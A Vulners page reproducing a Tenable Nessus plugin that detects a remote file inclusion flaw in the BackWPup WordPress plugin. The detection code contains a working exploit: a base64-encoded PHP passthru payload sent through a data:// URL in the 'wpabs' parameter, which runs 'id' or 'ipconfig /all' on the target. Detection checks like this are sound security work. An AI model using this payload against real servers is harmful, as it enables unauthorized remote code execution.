Lucene search
K

BackWPup for WordPress Plugin Remote File Inclusion

🗓️ 29 Mar 2011 00:00:00Reported by TenableType 
nessus
 nessus
🔗 www.tenable.com👁 25 Views

The version of BackWPup for WordPress plugin allows remote file inclusion via the 'wp_xml_export.php' script, potentially leading to arbitrary code execution

Refs
Code
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(53210);
  script_version("1.12");
  script_set_attribute(attribute:"plugin_modification_date", value:"2025/05/14");
  script_bugtraq_id(47058);
  script_xref(name:"EDB-ID", value:"17056");

  script_name(english:"BackWPup for WordPress Plugin Remote File Inclusion");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server hosts a PHP script that is vulnerable to a
remote file inclusion attack.");
  script_set_attribute(attribute:"description", value:
"The version of the BackWPup for WordPress plugin installed on the
remote host does not sanitize input to the 'wpabs' parameter of the
'app/wp_xml_export.php' script before using it in a 'require_once()'
call when the '_nonce' parameter is set to a specific value.

An attacker can leverage this issue to view files on the local host or
to execute arbitrary PHP code, possibly taken from third-party hosts.");
  script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/517207/30/0/threaded");
  script_set_attribute(attribute:"solution", value:
"Upgrade to BackWPup version 1.7.0 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2011/03/28");
  script_set_attribute(attribute:"patch_publication_date", value:"2011/03/27");
  script_set_attribute(attribute:"plugin_publication_date", value:"2011/03/29");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:wordpress:wordpress");
  script_set_attribute(attribute:"enable_cgi_scanning", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2011-2025 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("wordpress_detect.nasl");
  script_require_keys("installed_sw/WordPress", "www/PHP");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");
include("webapp_func.inc");
include("data_protection.inc");

app = "WordPress";
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80, php:TRUE);

install = get_single_install(
  app_name : app,
  port     : port
);
dir = install['path'];
install_url = build_url(port:port, qs:dir);

plugin = "BackWPup";

# Check KB first
installed = get_kb_item("www/"+port+"/webapp_ext/"+plugin+" under "+dir);

if (!installed)
{
  checks = make_array();
  path = "/wp-content/plugins/";
  checks[path + "backwpup/lang/backwpup.pot"][0] =
    make_list('Run Database', 'BackWPup Job');
  # Readme.txt
  checks[path + "backwpup/readme.txt"][0] =
    make_list('=== BackWPup( Free)?');

  # Ensure plugin is installed
  installed = check_webapp_ext(
    checks : checks,
    dir    : dir,
    port   : port,
    ext     : plugin
  );
}
if (!installed)
  audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + " plugin");

# Try to exploit the issue to run a command.
os = get_kb_item("Host/OS");
if (os && report_paranoia < 2)
{
  if ("Windows" >< os) cmd = 'ipconfig /all';
  else cmd = 'id';

  cmds = make_list(cmd);
}
else cmds = make_list('id', 'ipconfig /all');

cmd_pats = make_array();
cmd_pats['id'] = "uid=[0-9]+.*gid=[0-9]+.*";
cmd_pats["ipconfig /all"] = "Subnet Mask";

nesstr = "NESSUS_" + toupper(rand_str());
payload = '<?php passthru(base64_decode($_GET[' + nesstr + '])); die; ?>';

foreach cmd (cmds)
{
  url = dir + '/wp-content/plugins/backwpup/app/wp_xml_export.php?' +
    '_nonce=822728c8d9&' +
    'wpabs=data://text/plain;base64,' + urlencode(str:base64(str:payload)) + '&' +
    nesstr + '=' + base64(str:cmd);

  # nb: the PHP script hardcodes a 404 response unless 'wpabs' points to
  #     the WordPress installation directory so we need to fetch the
  #     response body in such a response.
  res = http_send_recv3(method:"GET", item:url, port:port, fetch404:TRUE, exit_on_fail:TRUE);

  if (egrep(pattern:cmd_pats[cmd], string:res[2]))
  {
    if (report_verbosity > 0)
    {
      header =
        'Nessus was able to execute the command \'' + cmd + '\' on the remote\n' +
        'host using the following URL';
      trailer = '';

      if (report_verbosity > 1)
      {
        trailer =
          'This produced the following output :\n' +
          '\n' +
          crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n' +
          data_protection::sanitize_uid(output:res[2]) +
          crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n';
      }
      report = get_vuln_report(items:url, port:port, header:header, trailer:trailer);
      security_hole(port:port, extra:report);
    }
    else security_hole(port);
    exit(0);
  }
}
audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + " plugin");

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation